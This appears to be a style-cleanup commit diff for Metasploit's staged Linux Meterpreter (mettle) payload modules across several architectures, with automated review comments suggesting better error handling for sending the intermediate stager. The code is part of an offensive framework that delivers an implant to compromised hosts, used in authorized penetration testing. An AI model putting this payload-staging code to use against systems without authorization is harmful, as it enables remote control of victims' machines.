unify stager style
parent
e404dfeaea
commit
21bede1166
|
@ -11,22 +11,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_armle_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_armle_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
@ -70,15 +73,12 @@ module MetasploitModule
|
|||
entry_offset
|
||||
].pack('V*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
|
||||
conn.put [midstager.length].pack('V')
|
||||
conn.put midstager
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put([midstager.length].pack('V'))
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('arm-linux-musleabi', 'mettle.bin')
|
||||
end
|
||||
end
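Review bot: The result of `conn.put([midstager.length].pack('V'))` in the second hunk is discarded, so the new boolean return reflects only the second write. A short or failed write of the 4-byte length prefix followed by a complete write of the body would still return true. Assuming `put` returns the number of bytes written, as the comparison on the following line implies, both writes can be checked with `prefix = [midstager.length].pack('V')` and `conn.put(prefix) == prefix.length && conn.put(midstager) == midstager.length`. The return value also changed from an unconditional `true`, so a one-line comment saying what a false result means to the caller would help. The body of handle_intermediate_stage starts outside this hunk.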
|
||||
|
|
|
@ -12,22 +12,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
@ -83,40 +86,11 @@ module MetasploitModule
|
|||
0
|
||||
].pack('N*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
meterpreter = generate_meterpreter
|
||||
#config = generate_config(opts)
|
||||
#meterpreter + config
|
||||
end
|
||||
|
||||
def generate_meterpreter
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('mips-linux-muslsf', 'mettle.bin')
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
# create the configuration block, which for staged connections is really simple.
|
||||
config_opts = {
|
||||
:arch => opts[:uuid].arch,
|
||||
:exitfunk => nil,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:uuid => opts[:uuid],
|
||||
:transports => [transport_config(opts)],
|
||||
:extensions => [],
|
||||
:ascii_str => true
|
||||
}
|
||||
|
||||
# create the configuration instance based off the parameters
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
|
||||
# return the binary version of it
|
||||
config.to_b
|
||||
end
|
||||
end
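Review bot: When `conn.put(midstager) == midstager.length` is false, the method now returns without emitting any message, and the only status line was moved from `print_status` to `vprint_status`. At the default verbosity the console log therefore records neither the transmission nor its failure. I would keep the byte count and report the failure path explicitly: `sent = conn.put(midstager)`, then `print_error("Intermediate stager write incomplete (#{sent} of #{midstager.length} bytes)") unless sent == midstager.length`, then `sent == midstager.length`. The same applies to the sections using ARCH_ARMLE, ARCH_MIPSLE, Metasm::X64 and Metasm::X86. Whether the caller already logs a false return is not visible here, and the method body starts outside this hunk.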
|
||||
|
|
|
@ -12,22 +12,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsle_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsle_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
@ -83,40 +86,11 @@ module MetasploitModule
|
|||
0
|
||||
].pack('V*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
meterpreter = generate_meterpreter
|
||||
#config = generate_config(opts)
|
||||
#meterpreter + config
|
||||
end
|
||||
|
||||
def generate_meterpreter
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('mipsel-linux-muslsf', 'mettle.bin')
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
# create the configuration block, which for staged connections is really simple.
|
||||
config_opts = {
|
||||
:arch => opts[:uuid].arch,
|
||||
:exitfunk => nil,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:uuid => opts[:uuid],
|
||||
:transports => [transport_config(opts)],
|
||||
:extensions => [],
|
||||
:ascii_str => true
|
||||
}
|
||||
|
||||
# create the configuration instance based off the parameters
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
|
||||
# return the binary version of it
|
||||
config.to_b
|
||||
end
|
||||
end
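Review bot: `generate_stage(_opts = {})` has no comment saying that the options hash is deliberately unused, now that `generate_meterpreter` and `generate_config` are folded away or removed. A reader comparing this with other stage modules may expect configuration to be appended here. I would add above the method `# Returns mettle.bin for mipsel-linux-muslsf as read by MetasploitPayloads::Mettle; _opts is unused (presumably kept for signature compatibility).` The matching methods in the ARCH_ARMLE and ARCH_MIPSBE sections would take the same comment with their own target triple.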
|
||||
|
|
|
@ -81,6 +81,7 @@ module MetasploitModule
|
|||
add rsi, rax
|
||||
jmp rsi
|
||||
)
|
||||
|
||||
midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
|
|
|
@ -84,6 +84,7 @@ module MetasploitModule
|
|||
add edx, eax
|
||||
jmp edx
|
||||
)
|
||||
|
||||
midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
|
|